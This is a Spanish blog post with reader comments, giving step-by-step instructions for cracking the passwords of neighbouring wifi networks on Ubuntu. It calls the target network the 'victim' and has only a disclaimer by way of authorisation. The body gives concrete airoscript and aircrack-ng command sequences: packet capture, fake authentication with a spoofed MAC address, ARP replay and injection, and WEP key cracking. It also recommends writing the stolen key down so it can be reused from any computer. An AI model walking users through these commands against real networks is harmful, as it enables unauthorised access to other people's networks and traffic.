¨Como crackear (o Hackear) redes wifi en Ubuntu¨

30 10 2009

¨NOTA: LA INFORMACIÓN AQUÍ COLOCADA ES CON FINES DE CONOCIMIENTO GENERAL Y DE LIBRE TRANSMISIÓN DE LA INFORMACIÓN PUBLICA, EL USO DADO A ESTOS DATOS NO ES DE RESPONSABILIDAD DEL AUTOR¨

Voy a explicar los dos métodos q considero mas eficientes y rápidos:

  • Metodo 1 AiroScript en Ubuntu

Primero para poder entrar a una red protegida con clave debemos instalar algunos paquetes, estos se pueden instalar desde consola con el comando (sin las comillas ¨¨):

¨sudo apt-get install aircrack-ng konsole dhcpcd xterm kommander macchanger wireless-tools¨

Terminado esto hará falta descargar a nuestra pc el Script AiroSript, pueden hacerlo desde

- la versión en Ingles

http://daouid.googlepages.com/airoscript1-7RC2.sh

- la versión en español(recomendado) gracias a seguridadwireless.net

http://hwagm.elhacker.net/descargas/linux4/airoscript-sp.sh

listo esto, hay un par de errores en el Script que debemos corregir para que todo funcione correctamente:

Abrimos el archivo con permisos ROOT usando los comandos

¨$ cd /DIRECTORIO DE LA DESCARGA/¨

¨$ sudo gedit airoscript-sp.sh ¨

(recuerden no poner ¨¨ ni $ de lo contrario no funcionara)

- En la linea 1

Tenemos: #! /bin/sh

Remplazar por #! /bin/bash

- En la linea 331

Tenemos: function de_auth_fake {ct

Remplazar por: function de_auth_fake {

Listo! guardar y cerrar, ahora necesitamos darle permisos de ejecucion, para esto, clic derecho sobre el archivo propiedades>permisos y marcamos la opcion ¨permitir al archivo ejecutar como un programa¨ aceptar y cerrar…

De vuelta a la consola, nuevamente usamos:

¨$ cd /LUGAR_DONDE_ESTA_EL_ARCHIVO/¨

¨$ sudo ./airoscript-sp.sh ¨

–>Con eso se ejecutara el programa

Deberían tener una pantalla similar a:

1) Seleccionen la tarjeta de red que quieren usar para el ataque normalmente es la ath0, seleccionen y enter

2)Ahora en el menú principal del Script seleccionamos la opcion 1. Scan de esta forma escaneara las redes en busca de víctimas, nos dara a eleguir si escanear todos los canales (recomendado) o un canal especifico, selecciona y enter

3) Ahora volvemos al menú, y usamos la opción 2.Select para eleguir la victima

4) A continuación usamos la opción 3. Atack, esto tomara tiempo (varias horas) dependiendo de la tarjeta wifi q tenga tu equipo debido a que debe leer 200.000 y 1.000.000 de paquetes.

5) Terminado el paso anterior volvemos a la ventana principal y seleccionamos Crack, el programa usara los paquetes recopilados para descifrar la clave basándose en diccionario o en código aleatorio,

Si todo salio bien, tenemos la clave del router que atacamos, les recomiendo anotarla en alguna hoja de papel o en algun archivo para no tener q repetir todo el proceso una vez mas, con esa clave pueden entrar desde cualquier otra computadora.

  • Metodo 2 Aircrack

     

     

(Más rápido y Eficiente)

1º) Instalación

- Si usas Ubuntu Linux no hace falta que hagas todo esto, simplemente ve a “Sistema > Administración > Synaptic” e instala el paquete “aircrack-ng”.

- También puedes saltarte el paso de la instalación si usas BackTrack Linux, pues trae todo ya instalado. (Más abajo hablamos de él).

Empezamos: Antes de nada tenemos que asegurarnos de que nuestro nucleo tiene compatibilidad con nuestro dispositivo wifi, para saber que nucleo tenemos abrimos un terminal y ejecutamos

$ uname -a

Esto nos dara la info de nuestro equipo. En el caso de que no funcione nuestra tarjeta wifi tendremos que mirar por internet a ver qué chip tiene e instalar el driver adecuado.

Una vez vemos que nuestro equipo es capaz de conectar a una red wifi conocida continuaremos. Tras haber configurado la red wifi debemos saber qué interface tiene:

$ iwconfig

De la lista que sale buscamos la interfaz que corresponda al wifi. (puedes usar también el comando ifconfig -a) A partir de aqui supongo que se llama “eth1″.

Ahora bajarmos Aircrack y lo compilamos. Antes de descargarlo hay que instalar sus dependencias:

# apt-get install build-essential

despues a compilar:

$ wget http://download.aircrack-ng.org/aircrack-ng-1.0-rc1.tar.gz

$ tar -zxvf aircrack-ng-1.0-rc1.tar.gz

$ cd aircrack-ng-1.0-rc1

$ make

$ sudo make install

2º) Cómo usar Aircrack

Una vez tenemos en nuestras manos este programita ya podemos empezar…

Abrimos un terminal de comandos, lo recomendable es operar en él como root para que no tengamos que ir poniendo “sudo” antes de cada cada orden, esto se hace con el comando:

$ sudo su

Lo primero es ver las redes wifi a las que tenemos acceso:

# airodump-ng eth1

Consejos:

- Sustituye “eth1″ por la interface de tu tarjeta wireless tambien puede presentarse como ¨wlan0¨(mira cuál es con el comando iwconfig).

- Si te da un error del tipo “resource busy” significa que estás conectado a otra red wifi. Para que funcione simplemente desconectate de la red.

Una vez hecho esto nos sacara algo asi:

CH 14 ][ Elapsed: 1 min ][ 2008-11-26 19:28

BSSID PWR Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID

00:00:00:00:00:00 4 43 0 0 11 54. WEP WEP josewifi

11:11:11:11:11:11 64 8 0 14 54. WEP WEP juan

BSSID STATION PWR Rate Lost Packets Probes a

En este caso tenemos 2 redes a elegir, nos fijamos en la red ‘josewifi’ con una MAC de 00:00:00:00:00:00 en el canal CH 11. Suponiendo que este es nuestro objetivo nos fijamos en que tenga modo de encriptacion WEP.

Consejos:

- Para que airodump deje de actualizar los datos pulsa “Cntrol+C”.

- Puedes hacer búsquedas más detalladas usando las opciones que aparecen al ejecutar “airodump –help”

Ahora que ya tenemos fijado un objetivo lo que vamos a hacer es capturar Data y Beacons para luego lanzar aircrack-ng y descifrar su clave WEP.

1- Lanzamos airodump-ng para que capture paquetes:

$ airodump-ng –channel 11 –bssid 00:00:00:00:00:00 -w captura eth1

Ahora lo dejamos corriendo durante todo el rato para que vaya capturando en el archivo “captura-01.cap”, que guardará en la carpeta en la que estés trabajando (generalmente en tu carpeta de usuario).

2- (los pasos 2, 3 y 4 son opcionales) Nos vamos a identificar con la estacion para que nos permita inyectar trafico y asi tener más datos para sacar la contraseña antes.

# aireplay-ng -1 0 -a 00:00:00:00:00:00 -h 11:22:33:44:55:66 -e josewifi eth1

en la opción -h ocultamos nuestra MAC con una introducida (inventada) por nosotros

Nos deberia decir: Association successful

3- ARP-request replay. Abrimos otra consola y

# aireplay-ng -3 0 -a 00:00:00:00:00:00 -h 11:22:33:44:55:66 -e josewifi eth1

este también lo dejamos correr mientras que trabajamos.

4- Inyectar trafico. Este paso no funciona bien en todos los dispositivos wifi, dependiendo de los drivers y nucleo de nuestro equipo. Esto nos permitira acelerar notablemente el proceso de captura de paquetes.

# aireplay-ng -2 -a 00:00:00:00:00:00 -h 11:22:33:44:55:66 -r captura-01.cap eth1

5- Lanzar aircrack-ng para descifrar la contraseña:

# aircrack-ng -a 1 -e josewifi -b 00:00:00:00:00:00 captura-01.cap

El argumento “-a 1″ indica que estamos descifrando una contraseña WEP, para descifrar una WAP deberíamos poner “-a 2″.

Aircrack-ng también se debe dejar correr de fondo mientras se capturan paquetes porque ira intentando descifrar la clave segun vaya consiguiendo nuevos paquetes.

¡Y ya está! Una vez tengamos practica podremos crackear una contraseña WEP en unos 15 minutos.

About these ads

Acciones

Information

3 responses

26 01 2010
Lam

Buenas, me ha gustado mucho el “manual” Xd, y queria probarlo, pero al usar la opcion 1, en el momento en que voy a escanear las redes, se cierre el airodump y no escanea algo, y no estoy seguro de cual es el problema, segui los pasos, y no he conseguido respuesta, saludos!!!!

29 01 2010
Cesar Troya S.

hola, este tipo de problemas se presenta cuandon el paquete no fue correctamente compilado, faltan dependencias, o hay algun problema de drivers… te recomiendo q descartes una a una cada opcion

17 01 2011
Los números de 2010 « FREEAKX

[...] The busiest day of the year was 4 de febrero with 79 views. The most popular post that day was ¨Como crackear (o Hackear) redes wifi en Ubuntu¨. [...]

Deja un comentario

Introduce tus datos o haz clic en un icono para iniciar sesión:

Logo de WordPress.com

Estás comentando usando tu cuenta de WordPress.com. Cerrar sesión / Cambiar )

Imagen de Twitter

Estás comentando usando tu cuenta de Twitter. Cerrar sesión / Cambiar )

Foto de Facebook

Estás comentando usando tu cuenta de Facebook. Cerrar sesión / Cambiar )

Google+ photo

Estás comentando usando tu cuenta de Google+. Cerrar sesión / Cambiar )

Conectando a %s




Seguir

Recibe cada nueva publicación en tu buzón de correo electrónico.

%d personas les gusta esto: